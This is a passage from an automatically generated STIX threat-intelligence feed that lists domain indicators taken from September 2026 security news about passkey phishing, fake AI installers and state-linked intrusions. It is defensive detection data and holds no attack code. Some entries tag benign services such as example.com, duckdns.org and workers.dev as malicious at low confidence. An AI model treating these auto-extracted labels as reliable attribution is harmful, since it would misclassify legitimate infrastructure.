News","url":"https://cybersecuritynews.com/passkey-themed-phishing/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--82bb0c34-0c77-45db-9be4-3dce56b7cc51","created":"2026-09-10T13:23:09.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: oskeyconnect.com","description":"Seen in \"Hackers Use Passkey-Themed Phishing to Hijack Microsoft 365 Accounts and Steal Cloud Data\" (Cyber Security News). Context: hronization Domain myconnectkey[.]com Key connection Domain oskeyconnect[.]com Key connection Domain validationsetupac[.]com Account val","pattern":"[domain-name:value = 'oskeyconnect.com']","pattern_type":"stix","valid_from":"2026-09-10T13:23:09.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/passkey-themed-phishing/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--48418c06-11ad-4129-8887-625b0d3a957c","created":"2026-09-10T13:23:09.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: oskeyregister.com","description":"Seen in \"Hackers Use Passkey-Themed Phishing to Hijack Microsoft 365 Accounts and Steal Cloud Data\" (Cyber Security News). Context: ey synchronization Domain oskeysetup[.]com Key setup Domain oskeyregister[.]com Key registration Domain syncmykey[.]com Key synchronizati","pattern":"[domain-name:value = 'oskeyregister.com']","pattern_type":"stix","valid_from":"2026-09-10T13:23:09.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/passkey-themed-phishing/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b14691dd-3cda-4fa5-9e8f-2726a6b27106","created":"2026-09-10T13:23:09.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: oskeysetup.com","description":"Seen in \"Hackers Use Passkey-Themed Phishing to Hijack Microsoft 365 Accounts and Steal Cloud Data\" (Cyber Security News). Context: onization Domain oskeysync[.]com Key synchronization Domain oskeysetup[.]com Key setup Domain oskeyregister[.]com Key registration Dom","pattern":"[domain-name:value = 'oskeysetup.com']","pattern_type":"stix","valid_from":"2026-09-10T13:23:09.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/passkey-themed-phishing/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--66a451a7-5331-4f6a-af3b-549ccb04340f","created":"2026-09-10T13:23:09.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: oskeysync.com","description":"Seen in \"Hackers Use Passkey-Themed Phishing to Hijack Microsoft 365 Accounts and Steal Cloud Data\" (Cyber Security News). Context: r session Domain keysyncos[.]com Key synchronization Domain oskeysync[.]com Key synchronization Domain oskeysetup[.]com Key setup Dom","pattern":"[domain-name:value = 'oskeysync.com']","pattern_type":"stix","valid_from":"2026-09-10T13:23:09.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/passkey-themed-phishing/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2f422231-df1d-4fa2-aaa8-89cc2a8fdd40","created":"2026-09-10T13:23:09.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: passkeyhelpdesk.com","description":"Seen in \"Hackers Use Passkey-Themed Phishing to Hijack Microsoft 365 Accounts and Steal Cloud Data\" (Cyber Security News). Context: m becoming a data breach. Type Indicator Description Domain passkeyhelpdesk[.]com Passkey support lure Domain secure-passkey[.]com Passkey","pattern":"[domain-name:value = 'passkeyhelpdesk.com']","pattern_type":"stix","valid_from":"2026-09-10T13:23:09.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/passkey-themed-phishing/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--36aa86d4-8dfb-4548-a26a-cb9868238dbc","created":"2026-09-10T13:23:09.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: portalsetuphub.com","description":"Seen in \"Hackers Use Passkey-Themed Phishing to Hijack Microsoft 365 Accounts and Steal Cloud Data\" (Cyber Security News). Context: validationsetupac[.]com Account validation and setup Domain portalsetuphub[.]com Portal setup Note: IP addresses and domains are intention","pattern":"[domain-name:value = 'portalsetuphub.com']","pattern_type":"stix","valid_from":"2026-09-10T13:23:09.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/passkey-themed-phishing/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c94cba55-5346-438f-baef-bf85896b43b9","created":"2026-09-10T13:23:09.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: secure-passkey.com","description":"Seen in \"Hackers Use Passkey-Themed Phishing to Hijack Microsoft 365 Accounts and Steal Cloud Data\" (Cyber Security News). Context: on Domain passkeyhelpdesk[.]com Passkey support lure Domain secure-passkey[.]com Passkey security Domain setupmypasskey[.]com Passkey setu","pattern":"[domain-name:value = 'secure-passkey.com']","pattern_type":"stix","valid_from":"2026-09-10T13:23:09.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/passkey-themed-phishing/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--64de4c70-a0fe-47bc-88f2-55caf5925159","created":"2026-09-10T13:23:09.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: setupmypasskey.com","description":"Seen in \"Hackers Use Passkey-Themed Phishing to Hijack Microsoft 365 Accounts and Steal Cloud Data\" (Cyber Security News). Context: rt lure Domain secure-passkey[.]com Passkey security Domain setupmypasskey[.]com Passkey setup Domain add-passkey[.]com Passkey enrollment","pattern":"[domain-name:value = 'setupmypasskey.com']","pattern_type":"stix","valid_from":"2026-09-10T13:23:09.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/passkey-themed-phishing/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ef1584e5-0134-4cde-a88c-1185ec4a669e","created":"2026-09-10T13:23:09.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: syncmykey.com","description":"Seen in \"Hackers Use Passkey-Themed Phishing to Hijack Microsoft 365 Accounts and Steal Cloud Data\" (Cyber Security News). Context: ey setup Domain oskeyregister[.]com Key registration Domain syncmykey[.]com Key synchronization Domain myconnectkey[.]com Key connect","pattern":"[domain-name:value = 'syncmykey.com']","pattern_type":"stix","valid_from":"2026-09-10T13:23:09.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/passkey-themed-phishing/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--beb3801f-fa86-46f8-97c9-a373cb18a23b","created":"2026-09-10T13:23:09.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: validationsetupac.com","description":"Seen in \"Hackers Use Passkey-Themed Phishing to Hijack Microsoft 365 Accounts and Steal Cloud Data\" (Cyber Security News). Context: connection Domain oskeyconnect[.]com Key connection Domain validationsetupac[.]com Account validation and setup Domain portalsetuphub[.]com","pattern":"[domain-name:value = 'validationsetupac.com']","pattern_type":"stix","valid_from":"2026-09-10T13:23:09.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/passkey-themed-phishing/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--4bde44db-b307-4bd9-984b-6448b6b397f9","created":"2026-09-10T12:58:10.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: ip-109-091-184-021.um37.pools.vodafone-ip.de","description":"Seen in \"Redtail Payload Analysis &#x5b;Guest Diary&#x5d;, (Wed, Sep 9th)\" (SANS Internet Storm Center). Context: utsche Telekom AG (AS3320), while 109.91.184.21 resolved to ip-109-091-184-021.um37.pools.vodafone-ip.de and belonged to a Vodafone GmbH static B2B customer pool (A","pattern":"[domain-name:value = 'ip-109-091-184-021.um37.pools.vodafone-ip.de']","pattern_type":"stix","valid_from":"2026-09-10T12:58:10.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"SANS Internet Storm Center","url":"https://isc.sans.edu/diary/rss/33326"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--86407997-7467-45f6-96b6-b7d48d6858fb","created":"2026-09-10T12:58:10.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: mail3.kekew.info","description":"Seen in \"Redtail Payload Analysis &#x5b;Guest Diary&#x5d;, (Wed, Sep 9th)\" (SANS Internet Storm Center). Context: erse-DNS information showed that 80.152.203.134 resolved to mail3.kekew.info and was allocated to Deutsche Telekom AG (AS3320), while 10","pattern":"[domain-name:value = 'mail3.kekew.info']","pattern_type":"stix","valid_from":"2026-09-10T12:58:10.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"SANS Internet Storm Center","url":"https://isc.sans.edu/diary/rss/33326"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8ca4d8a3-a4b8-4e8b-be78-3bc1959e6eb5","created":"2026-09-10T10:57:11.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: bloom.io","description":"Seen in \"New Phishing Attack Uses Blob URLs to Hide Malicious Pages From Security Scanners\" (GBHackers). Context: r ultimately leads Teams to load external content from cdn. bloom[.]io. Rather than displaying that content as a normal external","pattern":"[domain-name:value = 'bloom.io']","pattern_type":"stix","valid_from":"2026-09-10T10:57:11.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/phishing-attack-uses-blob-urls/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--669f3764-f8e8-4e3c-b990-6a57113590fd","created":"2026-09-10T10:00:43.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: example.com","description":"Seen in \"The Machine With Many Faces: Post-Exploitation Identity Misuse in SPIFFE/SPIRE\" (Palo Alto Unit 42). Context: >/<path> (Figure 1). Figure 1. SPIFFE ID. The middle part ( example[.]com ) in Figure 1 is the trust domain, the issuer of identity","pattern":"[domain-name:value = 'example.com']","pattern_type":"stix","valid_from":"2026-09-10T10:00:43.000Z","labels":["auto-extracted","research"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/kubernetes-spiffe-spire-identity-spoofing/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b007489c-a057-4036-96db-313cfe403434","created":"2026-09-10T09:53:52.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: asia.newsinweb.com","description":"Seen in \"Hackers Use Fake Claude and ChatGPT Installers to Infect Mac Users With Password-Stealing Malware\" (Cyber Security News). Context: drivinguber.com Primary command-and-control host C2 domain asia.newsinweb.com Regional fallback command-and-control host C2 domain usa.ne","pattern":"[domain-name:value = 'asia.newsinweb.com']","pattern_type":"stix","valid_from":"2026-09-10T09:53:52.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/fake-claude-and-chatgpt-installers/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--91265006-2064-4c93-8940-2ab6397a2018","created":"2026-09-10T09:53:52.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: drivinguber.com","description":"Seen in \"Hackers Use Fake Claude and ChatGPT Installers to Infect Mac Users With Password-Stealing Malware\" (Cyber Security News). Context: ist Possible renamed LaunchAgent persistence file C2 domain drivinguber.com Primary command-and-control host C2 domain asia.newsinweb.c","pattern":"[domain-name:value = 'drivinguber.com']","pattern_type":"stix","valid_from":"2026-09-10T09:53:52.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/fake-claude-and-chatgpt-installers/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--cd6043e8-98c8-4abb-a578-00a1265f1187","created":"2026-09-10T09:53:52.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: newsinweb.com","description":"Seen in \"Hackers Use Fake Claude and ChatGPT Installers to Infect Mac Users With Password-Stealing Malware\" (Cyber Security News). Context: m Regional fallback command-and-control host C2 root domain newsinweb.com Root domain used for fallback infrastructure Download URI /","pattern":"[domain-name:value = 'newsinweb.com']","pattern_type":"stix","valid_from":"2026-09-10T09:53:52.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/fake-claude-and-chatgpt-installers/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--75cff21e-a579-423f-bcb6-2a22ed554a60","created":"2026-09-10T09:53:52.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: usa.newsinweb.com","description":"Seen in \"Hackers Use Fake Claude and ChatGPT Installers to Infect Mac Users With Password-Stealing Malware\" (Cyber Security News). Context: eb.com Regional fallback command-and-control host C2 domain usa.newsinweb.com Regional fallback command-and-control host C2 root domain n","pattern":"[domain-name:value = 'usa.newsinweb.com']","pattern_type":"stix","valid_from":"2026-09-10T09:53:52.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/fake-claude-and-chatgpt-installers/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--724a230a-26b3-4b7e-9bc1-ca8914d3c7ab","created":"2026-09-10T09:51:44.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: clck.ru","description":"Seen in \"Fake GTA 6 download delivers malware-packed bundle to impatient gamers\" (Help Net Security). Context: t file then launches Microsoft Edge and connects to https://clck[.]ru/34uJnp, where it confirms that it has an internet connect","pattern":"[domain-name:value = 'clck.ru']","pattern_type":"stix","valid_from":"2026-09-10T09:51:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Help Net Security","url":"https://www.helpnetsecurity.com/2026/09/10/fake-gta-6-downloads-malware-ransomware/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1e6714d8-f179-470f-abca-353053855fb3","created":"2026-09-10T09:19:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: add-passkey.com","description":"Seen in \"Hackers Pose as IT Support to Hijack Microsoft 365 Accounts With Fake Passkey Alerts\" (GBHackers). Context: helpdesk[.]com, secure-passkey[.]com, setupmypasskey[.]com, add-passkey[.]com, integratedsso[.]com, and oktasession[.]com. The operator","pattern":"[domain-name:value = 'add-passkey.com']","pattern_type":"stix","valid_from":"2026-09-10T09:19:40.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/microsoft-365-accounts-hijacked/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2c5a93c7-d3a4-4256-a619-3bbd101857d3","created":"2026-09-10T09:19:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: contoso.add-passkey.com","description":"Seen in \"Hackers Pose as IT Support to Hijack Microsoft 365 Accounts With Fake Passkey Alerts\" (GBHackers). Context: e operators commonly use organization-specific URLs such as contoso[.]add-passkey[.]com, which makes the fraudulent destination appear more cre","pattern":"[domain-name:value = 'contoso.add-passkey.com']","pattern_type":"stix","valid_from":"2026-09-10T09:19:40.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/microsoft-365-accounts-hijacked/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2f6aed66-262b-4248-859c-ece017054711","created":"2026-09-10T09:19:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: integratedsso.com","description":"Seen in \"Hackers Pose as IT Support to Hijack Microsoft 365 Accounts With Fake Passkey Alerts\" (GBHackers). Context: ure-passkey[.]com, setupmypasskey[.]com, add-passkey[.]com, integratedsso[.]com, and oktasession[.]com. The operators commonly use organi","pattern":"[domain-name:value = 'integratedsso.com']","pattern_type":"stix","valid_from":"2026-09-10T09:19:40.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/microsoft-365-accounts-hijacked/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--81e748aa-bde9-4266-b6ac-3bed2026b33e","created":"2026-09-10T09:19:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: keysyncos.com","description":"Seen in \"Hackers Pose as IT Support to Hijack Microsoft 365 Accounts With Fake Passkey Alerts\" (GBHackers). Context: ins SSO oktasession[.]com Domains Identity-provider session keysyncos[.]com Domains Key synchronization Note: IP addresses and domain","pattern":"[domain-name:value = 'keysyncos.com']","pattern_type":"stix","valid_from":"2026-09-10T09:19:40.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/microsoft-365-accounts-hijacked/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--4a5a43e9-d1c1-4f7e-81ab-63cddeb2a069","created":"2026-09-10T09:19:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: oktasession.com","description":"Seen in \"Hackers Pose as IT Support to Hijack Microsoft 365 Accounts With Fake Passkey Alerts\" (GBHackers). Context: ypasskey[.]com, add-passkey[.]com, integratedsso[.]com, and oktasession[.]com. The operators commonly use organization-specific URLs su","pattern":"[domain-name:value = 'oktasession.com']","pattern_type":"stix","valid_from":"2026-09-10T09:19:40.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/microsoft-365-accounts-hijacked/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9f3d70d6-6bd6-4796-a38d-c98410263e0e","created":"2026-09-10T09:19:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: passkeyhelpdesk.com","description":"Seen in \"Hackers Pose as IT Support to Hijack Microsoft 365 Accounts With Fake Passkey Alerts\" (GBHackers). Context: subdomain. Examples of observed lure infrastructure include passkeyhelpdesk[.]com, secure-passkey[.]com, setupmypasskey[.]com, add-passkey[","pattern":"[domain-name:value = 'passkeyhelpdesk.com']","pattern_type":"stix","valid_from":"2026-09-10T09:19:40.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/microsoft-365-accounts-hijacked/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b8730e5a-8936-4206-9d10-135094d33d08","created":"2026-09-10T09:19:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: secure-passkey.com","description":"Seen in \"Hackers Pose as IT Support to Hijack Microsoft 365 Accounts With Fake Passkey Alerts\" (GBHackers). Context: observed lure infrastructure include passkeyhelpdesk[.]com, secure-passkey[.]com, setupmypasskey[.]com, add-passkey[.]com, integratedsso[.","pattern":"[domain-name:value = 'secure-passkey.com']","pattern_type":"stix","valid_from":"2026-09-10T09:19:40.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/microsoft-365-accounts-hijacked/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--0d0ba992-c888-44ad-8c6f-160b49db2c65","created":"2026-09-10T09:19:40.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: setupmypasskey.com","description":"Seen in \"Hackers Pose as IT Support to Hijack Microsoft 365 Accounts With Fake Passkey Alerts\" (GBHackers). Context: ucture include passkeyhelpdesk[.]com, secure-passkey[.]com, setupmypasskey[.]com, add-passkey[.]com, integratedsso[.]com, and oktasession[","pattern":"[domain-name:value = 'setupmypasskey.com']","pattern_type":"stix","valid_from":"2026-09-10T09:19:40.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/microsoft-365-accounts-hijacked/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7b5f2ea5-0f73-475f-82b2-0b1de5587c0a","created":"2026-09-10T08:06:02.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: duckdns.org","description":"Seen in \"Hackers Use Claude and GPT-Powered Tools to Help Breach Government and Financial Networks\" (Cyber Security News). Context: d for data exfiltration troubleshooting Domain m-doxa-apodo.duckdns[.]org Mexican campaign infrastructure domain Domain m-doxa-geo.","pattern":"[domain-name:value = 'duckdns.org']","pattern_type":"stix","valid_from":"2026-09-10T08:06:02.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/gpt-powered-tools/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--620c1583-15db-45b6-a572-5092929b9a3e","created":"2026-09-10T06:02:43.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: duckdns.org","description":"Seen in \"Hackers Use LLMs to Generate Exploit Scripts and Automate Post-Exploitation Across Latin America\" (GBHackers). Context: cate SHA-256 Fingerprint Corresponding Host/IP m-doxa-apodo.duckdns[.]org 46ac289ce0c13666de616446f5d5a68da8bd150f4f065c3bec02f6377","pattern":"[domain-name:value = 'duckdns.org']","pattern_type":"stix","valid_from":"2026-09-10T06:02:43.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/llm-powered-cyberattacks/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--61c89a9b-71ab-4fa5-be6b-f8b9391027aa","created":"2026-09-10T05:20:30.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: netlas.io","description":"Seen in \"Hackers Deploy Hundreds of AI Agents to Compromise 440 PaperCut Servers\" (GBHackers). Context: Cut software and an Active Directory server. They also used Netlas.io to compile lists of potential targets. After validating the","pattern":"[domain-name:value = 'netlas.io']","pattern_type":"stix","valid_from":"2026-09-10T05:20:30.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/hackers-deploy-hundreds-of-ai-agents/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--fc73bdca-c2fb-454e-8ced-e8ed4a0a634d","created":"2026-09-10T05:15:03.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: attcdn.com","description":"Seen in \"China-Linked Hackers Exploit Chrome and Windows Zero-Days in BlueMoon Attacks\" (GBHackers). Context: om Domain TA412 delivery and download domain September 2026 attcdn[.]com Domain TA412 delivery and download domain September 2026","pattern":"[domain-name:value = 'attcdn.com']","pattern_type":"stix","valid_from":"2026-09-10T05:15:03.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/china-linked-hackers-exploit-chrome-and-windows-zero-days/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2d1f1669-fc50-44ad-960d-f83a299c3ea0","created":"2026-09-10T05:15:03.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: msbenefit.com","description":"Seen in \"China-Linked Hackers Exploit Chrome and Windows Zero-Days in BlueMoon Attacks\" (GBHackers). Context: .]com Domain TA412 delivery and download domain August 2026 msbenefit[.]com Domain TA412 delivery and download domain September 2026","pattern":"[domain-name:value = 'msbenefit.com']","pattern_type":"stix","valid_from":"2026-09-10T05:15:03.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/china-linked-hackers-exploit-chrome-and-windows-zero-days/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8e2a5103-6dab-4919-84d4-a4e191943699","created":"2026-09-10T05:15:03.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: secboxes.com","description":"Seen in \"China-Linked Hackers Exploit Chrome and Windows Zero-Days in BlueMoon Attacks\" (GBHackers). Context: 26c17b2d09d56848893f9d98ee SHA256 background.js August 2026 secboxes[.]com Domain TA412 delivery and download domain August 2026 msb","pattern":"[domain-name:value = 'secboxes.com']","pattern_type":"stix","valid_from":"2026-09-10T05:15:03.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/china-linked-hackers-exploit-chrome-and-windows-zero-days/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d6b93691-2d02-472f-941b-3b37b033901f","created":"2026-09-10T05:15:03.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: workers.dev","description":"Seen in \"China-Linked Hackers Exploit Chrome and Windows Zero-Days in BlueMoon Attacks\" (GBHackers). Context: d URL August 2026 extension-management-portal.centerfjdr658.workers[.]dev Hostname GemStone browser extension C&C August 2026 exten","pattern":"[domain-name:value = 'workers.dev']","pattern_type":"stix","valid_from":"2026-09-10T05:15:03.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/china-linked-hackers-exploit-chrome-and-windows-zero-days/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--6e91ad46-9953-41b7-bc7c-b0e967cf77d4","created":"2026-09-10T05:00:14.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: bloom.io","description":"Seen in \"Cybercriminals are building phishing pages that exist only inside victims’ browsers\" (Help Net Security). Context: s. Teams loads a resource hosted on an external domain, cdn.bloom[.]io, which ultimately results in the phishing page being rend","pattern":"[domain-name:value = 'bloom.io']","pattern_type":"stix","valid_from":"2026-09-10T05:00:14.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Help Net Security","url":"https://www.helpnetsecurity.com/2026/09/10/browser-based-phishing-blob-urls-microsoft-oauth/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f0111605-b35a-4856-90a5-54713405db25","created":"2026-09-09T17:41:18.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: add-passkey.com","description":"Seen in \"Passkey-themed social engineering leads to identity and cloud compromise\" (Microsoft Security Blog). Context: lpdesk[.]com, secure-passkey[.]com†, setupmypasskey[.]com†, add-passkey[.]com† SSO and identity provider integratedsso[.]com†, oktasess","pattern":"[domain-name:value = 'add-passkey.com']","pattern_type":"stix","valid_from":"2026-09-09T17:41:18.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Microsoft Security Blog","url":"https://www.microsoft.com/en-us/security/blog/2026/09/09/passkey-themed-social-engineering-leads-identity-cloud-compromise/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--5b53de1c-5041-4c95-9cba-ee2ff59ede05","created":"2026-09-09T17:41:18.000Z","modified":"2026-09-16T07:41:30.509Z","created_by_ref":"identity--ce8b23d2-5d4d-434a-bc4c-703d74cc4178","name":"domain: companyname.maliciousdomain.com","description":"Seen in \"Passkey-themed social engineering leads to identity and cloud compromise\" (Microsoft Security Blog). Context: uman trust. The actor creates domains following the pattern companyname[.]maliciousdomain[.]com to impersonate organization-specific authentication por","pattern":"[domain-name:value = 